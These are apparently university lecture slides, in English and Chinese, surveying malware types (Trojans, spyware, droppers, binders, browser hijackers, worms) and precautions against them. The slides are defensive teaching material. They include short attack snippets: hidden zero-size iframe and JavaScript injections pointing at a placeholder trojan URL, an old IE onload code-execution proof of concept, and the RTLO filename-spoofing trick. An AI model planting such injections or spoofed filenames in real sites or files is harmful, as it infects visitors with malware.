Malware

advertisement
The Attack and Defense of
Computers
Dr. 許 富 皓
1
Malware
2
Malicious Software (Malware):













Security tools and toolkits
Back doors (trap doors)
Logic bombs
Viruses
Worms
Binders
Droppers
Trojan Horses
Browser Hijacker
Spyware
Rootkit
URL Injection
…
3
Security Tools and toolkits

Automatically scan for computer security
weaknesses.
 Can
be used by both security professionals and
attackers.
 e.g. Nessus, COPS, ISS, Tiger, … and so on.


Unwittingly release reports to the public
There are also programs and tool sets whose
only function is to attack computers.
 Script kids
 P.S. These tools may damage the systems that install them
or may contain booby-trap that will compromise the systems
that install them.
4
Logic Bombs

A logic bomb is a piece of code
intentionally inserted into a software
system that will set off a malicious function
when specified conditions are met.
 For

example, a programmer may hide a piece
of code that starts deleting files, should he
ever leave the company (and the salary
database).
Usually written by inner programmers.
5
Logic Bombs and Viruses and Worms

Software that is inherently malicious, such as
viruses and worms, often contain logic bombs that
execute a certain payload
 at
a pre-defined time
or
 when some other condition is met.

Many viruses attack their host systems on specific
dates, such as Friday the 13th or April
Fool's Day.

Trojans that activate on certain dates are often
called "time bombs".
6
Key Logger
A program or hardware device that captures
every key depression on the computer.
 Also known as "Keystroke Cops," they are
used to monitor a user's activities by
recording every keystroke the user makes,
including typos, backspacing, and retyping.

7
Security Concerns about Key Loggers



Keystroke logging can be achieved by both
hardware and software means.
There is no easy way to prevent keylogging
software being installed on your PC, as it is
usually done by a method of stealth.
If you are using a home PC, then it is likely to be
free on any keystroke logging hardware (but
remember there may be keystroke logging
software).
8
Precautions against Key Loggers
Try and avoid typing private details on
public PCs,
 Always try and avoid visiting sites on
public PCs that require you to enter your
login details, e.g. an online banking
account.

9
Example

Ardamax Keylogger [1]
10
URL Injection

Change the URL submitted to a server
belonging to some or all domains.
11
Browser Hijacker
12
Browser Hijacker [Rouse]

A browser hijacker (sometimes called
hijackware) is a type of malware program
that alters your computer's browser settings
so that you are redirected to Web sites that
you had no intention of visiting.
13
Symptoms of Browser Hijackers (1) [Khanse]
Home page is changed
 Default search engine is changed
 You can’t navigate to certain web pages
like home pages of security software
 You get re-directed to pages you never
intended to visit

14
Symptoms of Browser Hijackers (2)
You see ads or ads pop up on your
screen. But these ads are not served by
the website
 You see new toolbars added
 You see new Bookmarks or Favorites
added.
 Your web browser starts running
sluggishly.

15
Infection of Browser Hijackers
[Rouse]
A browser hijacker may be installed as
part of freeware installation.
 A browser hijacker may also be installed
without user permission, as the result of
an infected e-mail, a file share, or a driveby download.

16
Redirection [PCSTATS]
As well as making changes to your home
page and other IE settings, a hijacker may
also make entries to the hosts file on
your system.
 This special file directly maps DNS
addresses (web URLs) to IP addresses,
so every time you typed certain URLs you
might be redirected to the IP address of a
sponsored search or porn site instead.

17
Absolute File Name of file hosts
C:\WINDOWS\SYSTEM32\drivers\etc\hosts
18
Self-Protection Mechanisms of
Browser Hijackers [PCSTATS]

These programs often use a combination
of hidden files and registry settings to
reinstall themselves after removal, so
deleting them or changing your IE settings
back may well not work.
19
Add-on
20
Add-on [stackoverflow]
Add-on: essentially anything that can be
installed into the browser.
 This includes for example

 extensions
 themes
 plug-ins
 dictionaries
 language
packs
 search engines.
21
Terminologies [alex301]
plug-in = 指那些需編譯成執行檔,用以提
供瀏覽器額外功能的東西。
 extension = 使用瀏覽器支援的程式語法,
用來改變瀏覽器功能與操作的東西。
 theme = 使用瀏覽器支援的程式語法,用來
改變瀏覽器外觀介面的東西。
 addon = plugin +extension + theme = 總稱
所有瀏覽器本體之外,用來改變瀏覽器的
東西。

22
Browser Plug-in [mozillazine]

Plug-ins add new functionality to an
application, such as
 viewing
special graphical formats
or
 playing multimedia content in a web browser.

Plug-ins also differ from extensions, which
modify or add to existing functionality.
23
Browser Plug-in [wikipedia]


Plug-ins add specific abilities into browsers
using application programming interfaces (APIs)
allowing third parties to create plug-ins that interact
with the browser.
The original API was NPAPI, but subsequently
Google introduced the PPAPI interface in Chrome.
24
General Plug-in Framework [wikipedia]
25
General Plug-in Mechanism [wikipedia]

A host application provides services which
the plug-in can use, including a way for
plug-ins to register themselves with the
host application and a protocol for the
exchange of data with plug-ins.
26
Uses of Browser Plug-ins

Common uses of plug-ins on the web
include
 displaying
video in the browser,
 games,
and
 music playback.

Widely used plug-ins include Java, Flash,
Quicktime, and Adobe Reader.
27
Browser Plug-in Form

A plug-in in the context of Mozilla-based
applications is a binary component that,
when registered with a browser, can
display content that the browser itself
cannot display natively.
28
Extension [wikipedia 1] [wikipedia 2]

Extensions can be used to
 modify
the behavior of existing features to an
application
or
 add entirely new features.

Therefore, after integration, extensions
can be seen as part of the browser itself,
tailored from a set of optional modules.
29
Extension technologies (1) [wikipedia]
CSS (Cascading Style Sheets)
 DOM (Document Object Model) – Used to
change XUL in real-time or to
edit HTML that is currently loaded
 JavaScript – The primary language of
Mozilla browsers
 XPCOM (Cross-Platform Component
Object Model)

30
Extension technologies (2) [wikipedia]
XPConnect
 XPI (Cross-Platform Installer)
 XUL (XML User Interface Language) –
Used to define the UI (User Interface) and
interaction with user.
 Mozilla Jetpack – a development kit
aiming to lower the learning curve and
development time for making add-ons

31
IE Extension [ivy]
Internet Explorer->Tools->Manage Addons
32
Mozilla Firefox [ivy]
Mozilla Firefox->Tools->Add-ons->Extensions
33
Google Chrome [ivy]
Google Chrome->Wrench Icon->Tools->Extensions
34
Browser Toolbar[wikipedia]
A browser toolbar is a toolbar that resides
within a browser's window.
 All major web browsers provide support to
browser toolbar development as a way to
extend the browser's GUI and functionality.
 Browser toolbars are considered to be a
particular kind of browser extensions that
present a toolbar.

35
Binder [CA]
36
Definition of Binder


A tool that combines two or more files into a
single file, usually for the purpose of hiding one
of them.
A binder compiles the list of files that you select
into one host file, which you can rename.
A
host file is a simple custom compiled program that
will decompress and launch the embedded
programs.
 When you start the host, the embedded files in it are
automatically decompressed and launched.
37
Example

When a piece of malware is bound with
Notepad, for instance, the result will
appear to be Notepad, and appear to run
like Notepad, but the piece of malware
will also be run.
38
Program

YAB: Yet Another Binder
 User
Guide
39
Embedded Files
The files embedded in a host file is not
always a binary file. It can be a file of any
type.
 Even an embedded file is a binary file, it
may be a normal program.

40
Dropper [Wikipedia]
41
Definition of a Dropper

A dropper is a program (malware
component) that has been designed to
"install" some sort of malware (virus,
backdoor, etc) to a target system.
 Single
stage: the malware code can be
contained within the dropper in such a way as
to avoid detection by virus scanners
 Two stages: the dropper may download the
malware to the target machine once activated
42
Types of Droppers

Depending on how a dropper is executed,
there are two major types of droppers:
 those

that do not require user interaction
perform through the exploitation of a system by
some vulnerability
 those
that require user interaction by
convincing the user that it is some legitimate
or benign program.
43
Trojan Horse [Wikipedia]
44
Trojan Horse


In the context of computer software, a Trojan horse is a
malicious program that is disguised as or embedded
within legitimate software.
Trojans use false and fake names to trick users into
executing them.



These strategies are often collectively termed social
engineering.
A Trojan is designed to operate with functions unknown
to the victim.
The useful, or seemingly useful, functions serve as
camouflage for these undesired functions.
45
Properties of Trojan Horses


Trojan horse programs cannot operate autonomously, in
contrast to some other types of malware, like worms.
Just as the Greeks needed the Trojans to bring the horse
inside for their plan to work,



Trojan horse programs depend on actions by the intended victims
if Trojans replicate and even distribute themselves, each new
victim must run the program/Trojan.
Due to the above reasons Trojan horses’ virulence
depends on

successful implementation of social engineering concepts
but doesn’t depend on

the flaws in a computer system's security design or configuration.
46
Categories of Trojan Horses

There are two common types of Trojan horses:
a
useful software that has been corrupted by a
cracker inserting malicious code that executes while
the program is used.

Examples include various implementations of



weather alerting programs
computer clock setting software
peer to peer file sharing utilities.
a
standalone program that masquerades as
something else, like a game or image file (e.g.
firework.jpg.exe in Windows.
47
Malware Parasitizes inside Trojan Horses

In practice, Trojan Horses in the wild often contain:
 spying
functions (such as a packet sniffer)
 backdoor functions that allow a computer, unbeknownst
to the owner, to be remotely controlled from the network,
creating a zombie computer.


The Sony/BMG rootkit Trojan, distributed on
millions of music CDs through 2005, did both of
these things.
Because Trojan horses often have these harmful
behaviors, there often arises the misunderstanding
that such functions define a Trojan Horse.
48
Example of a Simple Trojan Horse

A simple example of a Trojan horse would
be a program named waterfalls.jpg.exe
claiming to be a free waterfall picture which,
when run, instead begins erasing all the files
on the computer.
49
E-Mail Trojan Horses


On the Microsoft Windows platform, an attacker might
attach a Trojan horse with an innocent-looking filename to
an email message which entices the recipient into opening
the file.
The Trojan horse itself would typically be a Windows
executable program file, and thus must have an
executable filename extension such
as .exe, .com, .scr, .bat, or .pif.



Since Windows is sometimes configured by default to hide
filename extensions from a user, the Trojan horse has an
extension that might be "masked" by giving it a name such as
Readme.txt.exe.
With file extensions hidden, the user would only see Readme.txt
and could mistake it for a harmless text file.
Icons can also be chosen to imitate the icon associated
with a different and benign program, or file type.
50
Unicode控制字元202E 副檔名欺騙 [劉昱賢][1]

該手法係利用作業系統解讀檔案名稱時,若遇到Unicode控制字元,會改變檔
案名稱的顯示方式進行攻擊。attacker可以在檔案名稱中,插入特定的
Unicode控制字元,導致作業系統在顯示該檔案名稱時,誤導使用者。
大師兄[202E]gpj.exe

real filename
其中括號內為Unicode控制字元202E,該控制碼為不可視字元,可控制後續
字元由右至左顯示(Right To Left Override)。
當作業系統解譯與顯示檔案名稱時,會將其顯示為:
大師兄exe.jpg
displayed filename
51
Unicode控制字元202E 副檔名欺騙 [劉昱賢]
52
Commonly Used Methods of Infection
E-mails.
 Downloaded Files.

53
Emails and Trojan Horses
The majority of Trojan horse infections occur
because the user was tricked into running an
infected program.
 This is why you're not supposed to open
unexpected attachments on emails -- the
program is often a cute animation or a sexy
picture, but behind the scenes it infects the
computer with a Trojan or virus.

54
Downloaded Files

The infected program doesn't have to
arrive via email, though; it can be
 sent
to you in an Instant Message
 downloaded from a Web site or by FTP
 delivered on a CD or floppy disk
55
Precautions against Trojan Horses (1)


Trojan Horses are commonly spread through an
e-mail, much like other types of common viruses.
The best ways to protect yourself and your
company from Trojan Horses are as follows:
 If
you receive e-mail from someone that you do not
know or you receive an unknown attachment never
open it right away.
 As an e-mail user you should confirm the source.

P.S.: Some hackers have the ability to steal an address books
so if you see e-mail from someone you know that does not
necessarily make it safe.
56
Precautions against Trojan Horses (2)
 When
setting up your e-mail client make sure that
you have the settings so that attachments do not
open automatically.
 Some e-mail clients come ready with an anti-virus
program that scans any attachments before they are
opened.

If your client does not come with this it would be best to
purchase one or download one for free.
 Make
sure your computer has an anti-virus program
on it and make sure you update it regularly.

If you have an auto-update option included in your antivirus program you should turn it on, that way if you forget to
update your software you can still be protected from threats
57
Precautions against Trojan Horses (3)

Avoid using peer-2-peer or P2P sharing networks like
Kazaa, Limewire, Ares, or Gnutella because
1)
2)

those programs are generally unprotected from Trojan Horses
Trojan Horses are especially easy to spread through these programs
Some of these programs do offer some virus protection but often
they are not strong enough.
58
Precautions against Trojan Horses (4)

NEVER download blindly from people or sites which you
aren’t 100% sure about.


Even if the file comes form a friend, you still must be sure
what the file is before opening it.




However, legal web sites may be comprised by attackers who may
modify web pages to contain scripts to download malware.
Ask your friend whether she/he sent the files to you.
Beware of hidden file extensions (Under Windows
susie.jpg.exe is only shown as susie.jpg)
Never user features in your programs that automatically get
or preview files (outlook, preview mode ).
Never blindly type commands that others tell you to type, or
go to the web site mentioned by strangers.
59
Well-known Trojan Horses











Back Orifice
Back Orifice 2000
Beast Trojan
NetBus
SubSeven
Downloader-EV
Pest Trap
flooder
Tagasaurus
Vundo trojan
Gromozon Trojan
60
List of Trojan Horses

http://en.wikipedia.org/wiki/List_of_trojan_horses
61
網頁掛馬[趨勢科技]
62
Definition[趨勢科技]
[fanli7]
「網頁掛馬」又稱為網頁隱藏式惡意連結。
 攻擊者會先針對某個漏洞 (通常是
Windows 或 IE 的漏洞) 設計出一個特殊
的網頁 (也就是木馬網頁),當被攻擊的一
般使用者瀏覽這個網頁,就會利用該漏洞無
聲無息的趁機將惡意程式下載到被攻擊的電
腦中然後運行。

63
Websites

You can be infected by visiting a rogue
website.
 Internet
Explorer is most often targeted by
makers of Trojans and other pests.
 Some of the IE bugs improperly handle data
(such as HTML or images) by executing it as a
legitimate program.

Attackers who find such vulnerabilities can then
specially craft a bit of malformed data so that it
contains a valid program to do their bidding.
64
Features vs. Risks

The more "features" a web browser has,
the higher your risk of having security
holes that can be exploited by a Trojan
horse.
 for
example
ActiveX objects,
 some older versions of Flash
 Java

65
Example 1: Microsoft IE window()
Arbitrary Code Execution Vulnerability [Secunia]


The vulnerability is caused due to certain objects not being
initialized correctly when the window() function is used in
conjunction with the <body onload> event.
This can be exploited to execute arbitrary code on a
vulnerable browser via some specially crafted JavaScript
code called directly when a site has been loaded.
Example:
<body onload="window();">
Successful exploitation requires that the user is e.g. tricked
into visiting a malicious website.

PROOF OF CONCEPT
66
Explanation [Computer Terrorism]
67
<body onLoad= …> [HTML Code Tutorial]
The browser triggers onLoad when the
document is finished loading.
 The contents of onLoad is one or more
JavaScript commands.


So, for example, the following
<BODY ...> tag tells the browser to bring
up an alert box once the page is
completely loaded:
<BODY onLoad="alert('hello world!')">
68
MS IE - Crash on JavaScript
window()- calling (1)

There is a bug in Microsoft Internet Explorer,
which causes a crash in it.
 The
bug occurs, because Microsoft Internet
Explorer can't handle a call to a JavaScript-function
with the name of the "window"-object.
An object used in Javascript.
69
MS IE - Crash on JavaScript
window()- calling (2) [symantic]


Internet Explorer fails to properly initialize the
JavaScript `Window()' function. When the 'onLoad'
handler is set to call the improperly initialized
`Window()' function, the Web browser attempts to
call the address 0x006F005B, which is derived from
the Unicode representation of 'OBJECT'.
CALL DWORD [ECX+8]
1.
Crash, if pointing to non-code.
2.
Execution, if pointing to code.
It is shown that JavaScript prompt boxes can be used
by attackers to fill the memory region at 0x00600000
with attacker-supplied data, allowing executable
machine code to be placed into the required address
70
space.
Dangerous Web Site

The web site pointed by the following URL
is one containing the trap described in the
previous slides.

HTTP MSIE JavaScript OnLoad Rte CodeExec [symantic]
http://marc.theaimsgroup.com/?l=bugtraq&m=111746394106172&w=2
71
Microsoft Outlook

If you use Microsoft Outlook, you're
vulnerable to many of the same problems
that Internet Explorer has, even if you don't
use IE directly.
 The
same vulnerabilities exist since Outlook
allows email to contain HTML and images
and
 actually uses much of the same code to process these
as Internet Explorer.

72
Example 2: Trojan Horse Exploits
Image Flaw [Declan McCullagh et al.]



EasyNews, a provider of Usenet newsgroups,
said it has identified two JPEG images that take
advantage of a previously identified flaw ( a
heap-based buffer overflow [Michael Cobb] ) in the
way Microsoft software handles graphics files.
Windows users could have their computers
infected merely by opening one of those Trojan
horse images.
Attackers tried to use these JPEGs to download
Trojan (horse programs) to vulnerable
computers.
73
Example 3: Comprise a Web Server and
Add Hidden Download Instructions in Web
Pages (網站掛馬)

Create frame with size 0.
74
網站掛馬語法[OpenBlue]
75

通常被利用
[
弱點 ]
 [ SQL Injection ] 等
手法掛馬後,會在該網頁的[ 第一行或最
後一行中 ]出現[ 相關被掛馬語法 ] .
76
框架 (iframe) 掛馬

以下是部份語法:

<iframe src=木馬網址 width=0 height=0></iframe>
77
JScript 文件掛馬

首先將以下語法存檔為 xxx.js
document.write("<iframe width='0' height='0' src='
木馬網址'></iframe>");

然後將此文件的URL利用各種方式上傳到
目標處。
 For example,
 JScript 掛馬的語法為:
<script language=javascript src=xxx.js></script>
78
Precautions against 掛馬

Operating systems offer patches to protect their users
from certain threats and viruses, including Trojan Horses.


Software developers like Microsoft offer patches that in a sense
“close the hole” that the Trojan horse or other virus would use to
get through to your system.
If you keep your system updated with these patches your
computer is kept much safer.
79
Spyware [Wikipedia]
80
A Large Number of Toolbars, Some Added
by Spyware, Overwhelm an IE Session
81
Some Statistics about Spyware [A. Moshchuk et
al. ][Webroot]

2005



A scan (2005) performed by AOL/NCSA of 329 customers’
computers found that 80% were infected with spyware programs.
Each infected computer contained an average of 93 spyware
components.
2006:


Despite the publicity about the dangers of spyware, infection
rates are on the rise. Webroot spyware scan data shows that 89
percent of consumer PCs are infected with spyware.
U.S. home computer users are infected with an average of 30
pieces of spyware on their PCs.
82
Definition of Spyware

Spyware is computer software that is
installed surreptitiously on a personal
computer to
 monitor
 intercept
or
 take partial control over
the user's interaction with the computer,
without the user's informed consent.
83
Activities of Spyware

Spyware programs can
 secretly
monitor the user's behavior and then
send this information to a hacker over the
Internet
 collect various types of personal information
 interfere with user control of the computer in
other ways, such as
installing additional software
 redirecting Web browser activity
 diverting advertising revenue to a third party.

84
Spyware Funcions [A. Moshchuk et al. ]
85
Types of Information Collected by
Spyware

Spyware can collect many different types of
information about a user.
 More


benign programs can
attempt to track what types of websites a user visits
and
send this information to an advertisement agency.
 More
malicious versions can try to record what a user
types to try to intercept passwords or credit card
numbers.
86
OSes vs. Spyware
As of 2006, spyware has become one of
the preeminent security threats to
computer-systems running Microsoft
Windows OSes.
 Some malware on the Linux and Mac OS
X platforms has behavior similar to
Windows spyware, but to date has not
become anywhere near as widespread.

87
Spyware Certification

The Spyware-Free Certification program
evaluates software to ensure that the
program does not install or execute any
forms of malicious code.
88
Typical Tactics Adopted by Spyware
 Delivery
of unsolicited pop-up advertisements.
 Monitoring of Web-browsing activity for
marketing purposes.
 Theft of personal information
89
Adware (1) [wikipedia]



Adware, or advertising-supported software, is
any software package which automatically plays,
displays, or downloads advertisements to a
computer.
These advertisements can be in the form of a
pop-up.
They may also be
in the user interface of the software
or
on a screen presented to the user during the
installation process.
90
Adware (2) [wikipedia]


The object of the Adware is to generate revenue
for its author.
Adware, by itself, is harmless; however, some
adware may come with integrated spyware such
as keyloggers and other privacy-invasive
software.
91
Spyware and Pop-up Ads




Spyware displays advertisements related to what it
finds from spying on you, not the ones posted by
advertisers.
Claria Corporation's Gator Software and Exact
Advertising's BargainBuddy provide examples of
this sort of program.
Visited Web sites frequently install Gator on client
machines in a surreptitious manner, and it directs
revenue to the installing site and to Claria by
displaying advertisements to the user.
The user experiences a large number of pop-up
advertisements.
92
Pop-up Ads


Pop-up ads or popups are a form of online
advertising on the World Wide Web.
It works when certain web pages open a new
web browser window to display advertisements.
93
Creation of Pop-up Window

The pop-up window containing an advertisement is usually generated
by JavaScript, but can be generated by other means as well.
<html>
<body>
<script>
window.open
('http://www.google.com', "google" ,
"width=700,height=500,toolbar=0,menubar=0,location=0,s
tatus=1,scrollbars=1,resizable=1,left=0,top=0");
</script>
</body>
</html>
94
Pop-under Ads
A variation on the pop-up window is the
pop-under advertisement. This opens a
new browser window, behind the active
window.
 Pop-unders interrupt the user less, but are
not seen until the desired windows are
closed, making it more difficult for the user
to determine which Web page opened
them.

95
Dozens of Pop-up Ads Cover a
Desktop.
96
Web Activity Monitor
Spyware behavior, such as reporting on
websites the user visits, frequently
accompany the displaying of
advertisements.
 Monitoring web activity aims at building
up a marketing profile on users in order
to sell "targeted" advertisement
impressions.

97
Other Victims of Spyware

The prevalence of spyware has cast
suspicion upon other programs that
track Web browsing, even for statistical
or research purposes.
observers describe the Alexa
Toolbar, an Internet Explorer plug-in
published by Amazon.com, as spyware
(and some anti-spyware programs report it
as such) although many users choose to
install it.
 Some
98
Identity Theft and Fraud


Some spyware is closely associated with identity theft.
Spyware may transmit the following information to
attackers:





chat sessions,
user names,
passwords,
bank information, etc.
Spyware has principally become associated with
identity theft in that keyloggers are routinely
packaged with spyware.

John Bambenek, who researches information security,
estimates that identity thieves have stolen over $24 billion
US dollars of account information in the United States alone
99
Routes of Infection
100
Routes of Infection

Spyware does not directly spread in the
manner of a computer virus or worm:
 generally,
an infected system does not attempt
to transmit the infection to other computers.

Instead, spyware gets on a system
 through
deception of the user
or
 through exploitation of software vulnerabilities.
101
Masquerade

One way of distributing spyware
involves tricking users by manipulating
security features designed to prevent
unwanted installations.
102
Masquerade - Example



The Internet Explorer Web browser, by design,
prevents websites from initiating an unwanted
download.
Instead, a user action (such as clicking on a link)
must normally trigger a download.
However, links can prove deceptive:

For instance,
1.
2.
3.
A pop-up ad may appear like a standard Windows dialog box.
The box contains a message such as "Would you like to
optimize your Internet access?" with links which look like
buttons reading Yes and No.
No matter which "button" the user presses, a download starts,
placing the spyware on the user's system.
103
A Masquerade Example

Malicious websites may attempt to install spyware on
readers' computers.

In this screenshot a website has triggered a pop-up that offers
spyware in the guise of a security upgrade.
104
Bundled with Shareware

Spyware can also come bundled with
 shareware
 other downloadable
 music CDs.

software
The user downloads a program (for instance, a
music program or a file-trading utility) and installs it,
and the installer additionally installs the spyware.
Although the desirable software itself may do no
harm, the bundled spyware does.
 In
some cases, spyware authors have paid shareware
authors to bundle spyware with their software.
 In other cases, spyware authors have repackaged
desirable free software with installers that add spyware.
105
Bundled Shareware Example



The BearShare file-trading program, "supported" by WhenU spyware.
In order to install BearShare, users must agree to install "the SAVE!
bundle" from WhenU.
The installer provides only a tiny window in which to read the lengthy
license agreement. Although the installer claims otherwise, the software
transmits users' browsing activity to WhenU servers.
106
Through Trojan Horse



Classically, a Trojan horse, by definition,
smuggles in something dangerous in the guise
of something desirable. Some spyware
programs get spread in just this manner.
The distributor of spyware presents the program
as a useful utility — for instance as a Web
accelerator or as a helpful software agent.
Users download and install the software without
immediately suspecting that it could cause harm.
107
Vulnerabilities in Web Browsers

Some spyware authors infect a system by attacking
security holes




in the Web browser
or
in other software.
When the user navigates to a Web page controlled by
the spyware author, the page contains code which
attacks the browser and forces the download and install
of spyware.
Common browser exploits target security vulnerabilities
in Internet Explorer and in the Microsoft Java runtime.
108
Notable Programs Distributed with
Spyware














Messenger Plus! (only if you agree to install their "sponsor" program)
Bearshare
Bonzi Buddy
DAEMON Tools (only if you agree to install their "sponsor" program)
DivX (except for the paid version, and the "standard" version without the
encoder). DivX announced removal of GAIN software from version 5.2.
Dope Wars
ErrorGuard
FlashGet (free version)
Grokster
Kazaa
Morpheus
RadLight
WeatherBug
EDonkey2000
109
Worm
110
Worms




Worm spread themselves through proactively
attacking programs with specific vulnerability.
Most frequently used attack approaches
included buffer overflow attacks, format string
attacks, integer overflow attacks, … and so on.
Morris Worm ,1988
Code Red, Slammer.
111
Comparisons between Viruses,
Trojan Horses, and Worms




The way they behave
How are they triggered?
How do they spread?
Need host programs?
112
Download
Related flashcards

Web colors

17 cards

Web design

34 cards

Web designers

34 cards

Create Flashcards